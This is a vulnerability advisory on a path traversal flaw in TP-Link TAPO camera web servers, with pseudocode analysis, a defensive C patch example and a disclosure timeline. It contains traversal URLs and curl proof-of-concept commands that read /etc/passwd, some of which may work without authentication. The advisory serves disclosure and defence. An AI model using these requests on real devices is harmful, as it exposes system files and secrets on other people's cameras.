An attacker sending a malformed HTTP POST request over LAN to a TP-Link Smart camera device can trigger the vulnerability described here.
This report describes a path traversal which can lead to leaking secrets.
The vulnerability we are disclosing in this advisory affected a wide range of TP-Link devices, including TAPO Smart Cameras. A TP-Link Security Advisory released in January 2026 and updated in April 2026 contains this vulnerability as CVE-2026-0651.
Vulnerability Details
We identified a path traversal vulnerability in the way the HTTP server of TAPO devices handles GET requests. The parser only gives access to specific directories without authentication. Even authorized users can access only a few paths. However, this restriction can be bypassed.
# Stage 1
http_parser() {
    path = ...; // points into the raw HTTP request line, with the first '?' or ' ' zeroed
    path_len = strlen(path);
    if (path_len >= 80) {
        // ... bail out, HTTP 414
    }
    ret = realpath(path, context->path); // [1]
    if (ret == NULL) {
        strcpy(context->path, path); // [2] raw, undecoded path kept as-is
    }
}
# Stage 2
http_get_handle() {
    ...
    // Simplified; there are other cases
    char *file_path = &context->file_path;
    snprintf(file_path, 0xa0, "/www%s", context->path); // [3]
    url_decode_in_place(file_path); // [4]
    pcVar3 = strchr(file_path, '?');
    if (pcVar3 != (char *)0x0) {
        *pcVar3 = '\0';
    }
    iVar2 = stat(file_path, &context->statbuf);
    if ((iVar2 != 0) || (((context->statbuf).st_mode & S_IFREG) == 0)) { // [5]
        msg_debug(0, 5, 2, "http_path_redrect", 0x975, "[HTTPD]path (%s) is wrong.", file_path);
        context->status = 404;
        return 0;
    }
    allowed = httpd_is_allowed_path(file_path); // [5]
    // starts with "/www/admin/Index.htm" OR
    // starts with "/www/admin/Login.htm" OR
    // starts with "/www/admin/LoginChgPwd.htm" OR
    // starts with "/www/loginLess" OR
    // starts with "/www/web-static"
    if (!allowed && !do_authorize(context)) {
        // bail out
    }
    // Later stages serve the file.
    ...
}
In http_parser(), realpath() is called at [1] to resolve symbolic links and special components such as /../, returning an absolute path.
Later, in http_get_handler, the directory /www is prepended to the path at [3], effectively restricting access to this directory.
However, if the call to realpath() fails, the parser simply uses the provided path as-is at [2], keeping arbitrary substrings such as /../.
To make realpath() fail, we can send a path containing URL-encoded characters, which it cannot parse.
The path is decoded in http_get_handler at [4], but nothing checks for directory escapes after that.
Because of these issues, a client that can authenticate itself as a user can access every file just by inserting a URL-encoded character, for example:
https://.../stok=${stok}/../etc/passwd%3F
https://.../stok=${stok}/%2e./etc/passwd
https://.../stok=${stok}/../etc/passwd%00
Not everything is accessible, though: block and character devices, for example, are restricted because of [5].
The PoC requires a successful login, which returns a variable stok.
Then:
curl -k --path-as-is https://$HOST/stok=${stok}/../etc/passwd%3F
curl -k --path-as-is https://$HOST/stok=${stok}/%2e./etc/passwd
curl -k --path-as-is https://$HOST/stok=${stok}/../etc/passwd%00
curl -k --path-as-is https://$HOST/stok=${stok}/web-static/../../etc/passwd%3F
While we analyzed a C520WS camera, this part of the TAPO codebase seems to have been developed primarily for some consumer router product family.
On a device where the /www/web-static directory also exists, authentication is not even needed to exploit this bug.
This is because of the whitelist at [5], which forces authorization only on paths other than the whitelisted ones.
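One way to close the gap between [2] and [4], as an added example that is not TP-Link's code or part of the original advisory: decode the request path exactly once, normalise it, and reject anything that would climb above /www before any file is touched. The name safe_request_path, the buffer sizes and the assumption that the stok segment has already been stripped from the path are illustrative.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define DOCROOT "/www" /* prefix added at [3] */

static int hexval(int c) { /* -1 if c is not a hex digit */
    const char *d = "0123456789abcdef", *p = strchr(d, tolower(c));
    return (c && p) ? (int)(p - d) : -1;
}
/* Hypothetical helper: decode once, normalise, confine to DOCROOT.
 * raw is the request path with the stok segment already stripped (assumed).
 * Returns 0 and fills out, or -1 when the request must be rejected. */
int safe_request_path(const char *raw, char *out, size_t outlen) {
    char dec[160], norm[160] = "";
    size_t n = 0;
    for (const char *p = raw; *p && *p != '?'; p++) { /* raw '?' ends the path */
        int c = (unsigned char)*p;
        if (c == '%') {
            int hi = hexval((unsigned char)p[1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)p[2]);
            if (lo < 0) return -1; /* malformed escape */
            c = hi * 16 + lo;
            p += 2;
        }
        if (c == 0 || n + 1 >= sizeof dec) return -1; /* %00 or too long */
        dec[n++] = (char)c; /* a decoded '?' stays a literal character */
    }
    dec[n] = '\0';
    if (dec[0] != '/') return -1;
    for (char *seg = strtok(dec, "/"); seg; seg = strtok(NULL, "/")) {
        if (strcmp(seg, ".") == 0) continue;
        if (strcmp(seg, "..") == 0) {
            char *cut = strrchr(norm, '/');
            if (!cut) return -1; /* ".." would climb above DOCROOT */
            *cut = '\0';
            continue;
        }
        snprintf(norm + strlen(norm), sizeof norm - strlen(norm), "/%s", seg);
    }
    int w = snprintf(out, outlen, DOCROOT "%s", norm);
    return (w > 0 && (size_t)w < outlen) ? 0 : -1;
}

int main(void) { /* constructed inputs modelled on the request paths above */
    const char *t[] = {"/../etc/passwd%3F", "/%2e./etc/passwd", "/web-static/js/../app.js"};
    char out[160];
    for (int i = 0; i < 3; i++)
        printf("%s -> %s\n", t[i], safe_request_path(t[i], out, sizeof out) ? "rejected" : out);
    return 0;
}
```

This check is purely lexical; where symbolic links can exist under /www, realpath() should still be run on the result, with a NULL return treated as a rejection rather than a fallback to the raw path.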
Affected Devices
- verified: TAPO C520WS
- potentially: TP-Link smart devices using the TAPO architecture
Timeline
- 2025.12.12. Vulnerability reported to TP-Link PSIRT by email.
- 2026.02.04. TP-Link acknowledges the report.
- 2026.03.04. TP-Link confirms the vulnerability and states that it is a duplicate of CVE-2026-0651, which was published for other models only.
- 2026.03.04. TASZK provides an update explaining the errors regarding impact in the details of TP-Link’s advisory for CVE-2026-0651.
- 2026.03.05. TP-Link again asks for a 3-week extension, does not confirm any TASZK analysis.
- 2026.03.24. TP-Link confirms that the advisory for CVE-2026-0651 will be updated to reflect the changed impact and severity.
- 2026.04.02. TP-Link releases advisory update for the vulnerability (https://www.tp-link.com/us/support/faq/4960/).
- 2026.04.06. TASZK communicates notice of release to TP-Link.
- 2026.04.28. Advisory released.